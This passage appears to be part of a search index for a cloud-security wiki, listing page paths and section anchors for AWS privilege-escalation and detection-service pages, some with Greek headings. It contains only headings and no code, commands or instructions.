cbeanstalkupdateenvironment-cloudformationgettemplate-cloudformationdescribestackresources-cloudformationdescribestackresource-autoscalingdescribeautoscalinggroups-autoscalingsuspendprocesses-autoscalingsuspendprocesses","pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.html#aws---emr-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.html#emr","pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.html#iampassrole-elasticmapreducerunjobflow","pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.html#elasticmapreducecreateeditor-iamlistroles-elasticmapreducelistclusters-iampassrole-elasticmapreducedescribeeditor-elasticmapreduceopeneditorinconsole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.html#elasticmapreduceopeneditorinconsole","pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.html#aws---eventbridge-scheduler-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.html#eventbridge-scheduler","pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.html#iampassrole-schedulercreateschedule--schedulerupdateschedule","pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.html#Αναφορές","pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.html#aws---gamelift","pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.html#gameliftrequestuploadcredentials","pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.html#Αναφορές","pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.html#aws---glue-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.html#glue","pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.html#iampassrole-gluecreatedevendpoint-gluegetdevendpoint--gluegetdevendpoints","pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.html#glueupdatedevendpoint-gluegetdevendpoint--gluegetdevendpoints","pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.html#iampassrole-gluecreatejob--glueupdatejob-gluestartjobrun--gluecreatetrigger","pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.html#glueupdatejob","pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.html#Αναφορές","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#aws---iam-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iam","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamcreatepolicyversion","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamsetdefaultpolicyversion","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamcreateaccesskey","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamcreateloginprofile--iamupdateloginprofile","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamupdateaccesskey","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamcreateservicespecificcredential--iamresetservicespecificcredential","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamattachuserpolicy--iamattachgrouppolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamattachrolepolicy---stsassumeroleiamcreaterole---iamputuserpolicy--iamputgrouppolicy--iamputrolepolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamaddusertogroup","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamupdateassumerolepolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamuploadsshpublickey--iamdeactivatemfadevice","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamresyncmfadevice","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamupdatesamlprovider-iamlistsamlproviders-iamgetsamlprovider","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamupdateopenidconnectproviderthumbprint-iamlistopenidconnectproviders-iam-getopenidconnectprovider-","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#Αναφορές","pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.html#aws---kms-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.html#kms","pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.html#kmslistkeyskmsputkeypolicy-kmslistkeypolicies-kmsgetkeypolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.html#kmscreategrant","pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.html#kmscreatekey-kmsreplicatekey","pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.html#kmsdecrypt","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#aws---lambda-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#lambda","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#iampassrole-lambdacreatefunction-lambdainvokefunction--lambdainvokefunctionurl","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#iampassrole-lambdacreatefunction-lambdaaddpermission","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#iampassrole-lambdacreatefunction-lambdacreateeventsourcemapping","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#lambdaaddpermission","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#lambdaaddlayerversionpermission","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#lambdaupdatefunctioncode","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#lambdaupdatefunctionconfiguration","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#iampassrole-lambdacreatefunction-lambdacreatefunctionurlconfig-lambdainvokefunctionurl","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#lambda-mitm","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#Αναφορές","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#aws---lightsail-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsail","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsaildownloaddefaultkeypair","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailgetinstanceaccessdetails","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailcreatebucketaccesskey","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailgetrelationaldatabasemasteruserpassword","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailupdaterelationaldatabase","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailopeninstancepublicports","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailputinstancepublicports","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailsetresourceaccessforbucket","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailupdatebucket","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailupdatecontainerservice","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailcreatedomainentry","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailupdatedomainentry","pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.html#aws---mediapackage-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.html#mediapackagerotatechannelcredentials","pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.html#mediapackagerotateingestendpointcredentials","pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.html#Αναφορές","pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.html#aws---mq-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.html#mq","pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.html#mqlistbrokers-mqcreateuser","pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.html#mqlistbrokers-mqlistusers-mqupdateuser","pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.html#mqlistbrokers-mqupdatebroker","pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.html#aws---msk-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.html#msk","pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.html#msklistclusters-mskupdatesecurity","pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.html#aws---rds-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.html#rds---Υπηρεσία-Σχεσιακής-Βάσης-Δεδομένων","pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.html#rdsmodifydbinstance","pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.html#rds-dbconnect","pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.html#Κατάχρηση-δικαιωμάτων-iam-ρόλου-rds","pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.html#rdsaddroletodbcluster-iampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.html#rdscreatedbinstance","pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.html#rdscreatedbinstance-iampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.html#rdsaddroletodbinstance-iampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.html#aws---redshift-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.html#redshift","pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.html#redshiftdescribeclusters-redshiftgetclustercredentials","pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.html#redshiftdescribeclusters-redshiftgetclustercredentialswithiam","pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.html#redshiftdescribeclusters-redshiftmodifycluster","pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.html#Πρόσβαση-σε-Εξωτερικές-Υπηρεσίες","pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.html#lambdas","pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.html#s3","pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.html#dynamo","pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.html#emr","pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.html#references","pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.html#aws---route53-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.html#route53createhostedzone-route53changeresourcerecordsets-acm-pcaissuecertificate-acm-pcagetcertificate","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.html#aws---sns-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.html#sns","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.html#snspublish","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.html#snssubscribe","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.html#snsaddpermission","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.html#aws---sqs-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.html#sqs","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.html#sqsaddpermission","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.html#sqssendmessage--sqssendmessagebatch","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.html#sqsreceivemessage-sqsdeletemessage-sqschangemessagevisibility","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#aws---sso--identitystore-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#aws-identity-center--aws-sso","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#reset-password","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#identitystorecreategroupmembership","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#ssoputinlinepolicytopermissionset-ssoprovisionpermissionset","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#ssoattachmanagedpolicytopermissionset-ssoprovisionpermissionset","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#ssoattachcustomermanagedpolicyreferencetopermissionset-ssoprovisionpermissionset","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#ssocreateaccountassignment","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#ssogetrolecredentials","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#ssodetachmanagedpolicyfrompermissionset","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#ssodetachcustomermanagedpolicyreferencefrompermissionset","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#ssodeleteinlinepolicyfrompermissionset","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#ssodeletepermissionboundaryfrompermissionset","pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.html#aws---organizations-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.html#Οργανώσεις","pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.html#Από-τον-λογαριασμό-διαχείρισης-στους-λογαριασμούς-παιδιών","pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.html#aws---s3-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.html#s3","pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.html#s3putbucketnotification-s3putobject-s3getobject","pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.html#s3putobject-s3getobject","pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.html#s3putobject-s3getobject-προαιρετικά-πάνω-από-το-αρχείο-κατάστασης-terraform","pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.html#s3putbucketpolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.html#s3getbucketacl-s3putbucketacl","pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.html#s3getobjectacl-s3putobjectacl","pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.html#s3getobjectacl-s3putobjectversionacl","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.html#aws---sagemaker-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.html#aws---sagemaker-privesc-1","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.html#iampassrole--sagemakercreatenotebookinstance-sagemakercreatepresignednotebookinstanceurl","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.html#sagemakercreatepresignednotebookinstanceurl","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.html#sagemakercreateprocessingjobiampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.html#sagemakercreatetrainingjob-iampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.html#sagemakercreatehyperparametertuningjob-iampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.html#Αναφορές","pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.html#aws---secrets-manager-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.html#secrets-manager","pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.html#secretsmanagergetsecretvalue","pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.html#secretsmanagergetresourcepolicy-secretsmanagerputresourcepolicy-secretsmanagerlistsecrets","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.html#aws---ssm-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.html#ssm","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.html#ssmsendcommand","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.html#ssmstartsession","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.html#ssmresumesession","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.html#ssmdescribeparameters-ssmgetparameter--ssmgetparameters","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.html#ssmlistcommands","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.html#ssmgetcommandinvocation-ssmlistcommandinvocations--ssmlistcommands","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.html#codebuild","pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.html#aws---step-functions-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.html#step-functions","pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.html#task-resources","pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.html#statesteststate--iampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.html#statescreatestatemachine--iampassrole--statesstartexecution--statesstartsyncexecution","pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.html#statesupdatestatemachine--όχι-πάντα-απαραίτητο-iampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.html#aws---sts-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.html#sts","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.html#stsassumerole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.html#stsgetfederationtoken","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.html#stsassumerolewithsaml","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.html#stsassumerolewithwebidentity","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.html#Κατάχρηση-Ομοσπονδίας","pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.html#aws---workdocs-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.html#workdocs","pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.html#workdocscreateuser","pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.html#workdocsgetdocument-workdocsdescribeactivities","pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.html#workdocsaddresourcepermissions","pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.html#workdocsaddusertogroup","pentesting-cloud/aws-security/aws-services/index.html#aws---Υπηρεσίες","pentesting-cloud/aws-security/aws-services/index.html#Τύποι-υπηρεσιών","pentesting-cloud/aws-security/aws-services/index.html#Υπηρεσίες-κοντέινερ","pentesting-cloud/aws-security/aws-services/index.html#Αφηρημένες-Υπηρεσίες","pentesting-cloud/aws-security/aws-services/index.html#Αρίθμηση-Υπηρεσιών","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/index.html#aws---Υπηρεσίες-Ασφάλειας--Ανίχνευσης","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#aws---cloudtrail-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#cloudtrail","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#aggregate-logs-from-multiple-accounts","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#cloudtrail-from-all-org-accounts-into-1","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#log-files-checking","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#logs-to-cloudwatch","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#event-history","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#insights","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#security","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#access-advisor","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#actions","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#csv-injection","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#Παράκαμψη-Ανίχνευσης","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#honeytokens--παράκαμψη","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#Πρόσβαση-σε-Τρίτη-Υποδομή","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#Τροποποίηση-Ρυθμίσεων-cloudtrail","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#Τροποποίηση-Ρυθμίσεων-bucket","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#ransomware-cloudtrail","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#Αναφορές","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#aws---cloudwatch-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatch","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#key-concepts","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#namespaces","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#metrics","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#dimensions","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#statistics","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#units","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatch-features","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#dashboard","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#metric-stream-and-metric-data","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#alarm","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#anomaly-detectors","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#insight-rules-and-managed-insight-rules","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatch-logs","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatch-monitoring--events","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#agent-installation","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#post-exploitation--bypass","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatchdeletealarmscloudwatchputmetricalarm--cloudwatchputcompositealarm","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatchdeletealarmactions-cloudwatchenablealarmactions-cloudwatchsetalarmstate","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatchdeleteanomalydetector-cloudwatchputanomalydetector","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatchdeletedashboards-cloudwatchputdashboard","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatchdeleteinsightrules-cloudwatchputinsightrule-cloudwatchputmanagedinsightrule","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatchdisableinsightrules-cloudwatchenableinsightrules","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatchdeletemetricstream--cloudwatchputmetricstream--cloudwatchputmetricdata","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatchstopmetricstreams-cloudwatchstartmetricstreams","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatchtagresource-cloudwatchuntagresource","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#Αναφορές","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.html#aws---config-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.html#aws-config","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.html#Λειτουργία","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.html#Κανόνες-config","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.html#aws---control-tower-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.html#control-tower","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.html#post-exploitation--persistence","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.html#aws---cost-explorer-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.html#cost-explorer-και-Ανίχνευση-Ανωμαλιών","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.html#Προϋπολογισμοί","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.html#aws---detective-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.html#detective","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#aws---firewall-manager-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#firewall-manager","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#Προαπαιτούμενα","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#Τύποι-πολιτικών-προστασίας","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#Λογαριασμοί-διαχειριστών","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#post-exploitation--bypass-detection","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#organizationsdescribeorganization--fmsassociateadminaccount-fmsdisassociateadminaccount-fmsputadminaccount","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#fmsputpolicy-fmsdeletepolicy","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#fmsbatchassociateresource-fmsbatchdisassociateresource-fmsputresourceset-fmsdeleteresourceset","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#fmsputappslist-fmsdeleteappslist","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#fmsputprotocolslist-fmsdeleteprotocolslist","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#fmsputnotificationchannel-fmsdeletenotificationchannel","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#fmsassociatethirdpartyfirewall-fmsdisssociatethirdpartyfirewall","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#fmstagresource-fmsuntagresource","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#Αναφορές","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.html#aws---guardduty-enum"